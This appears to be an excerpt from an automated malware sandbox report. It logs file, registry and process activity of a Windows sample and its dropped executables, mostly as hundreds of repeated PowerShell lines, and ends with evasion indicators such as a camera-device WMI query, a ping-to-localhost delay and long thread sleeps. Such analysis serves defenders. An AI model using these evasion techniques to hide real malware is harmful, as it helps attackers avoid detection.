Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\portintosvc\driverInto.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\portintosvc\driverInto.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\portintosvc\driverInto.exe Memory allocated: 12C0000 memory reserve | memory write watch
Source: C:\portintosvc\driverInto.exe Memory allocated: 1AF40000 memory reserve | memory write watch
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Memory allocated: E30000 memory reserve | memory write watch
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Memory allocated: 1A920000 memory reserve | memory write watch
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 922337203685477
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 600000
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599875
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599766
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599641
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599516
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599406
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 597282
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 597125
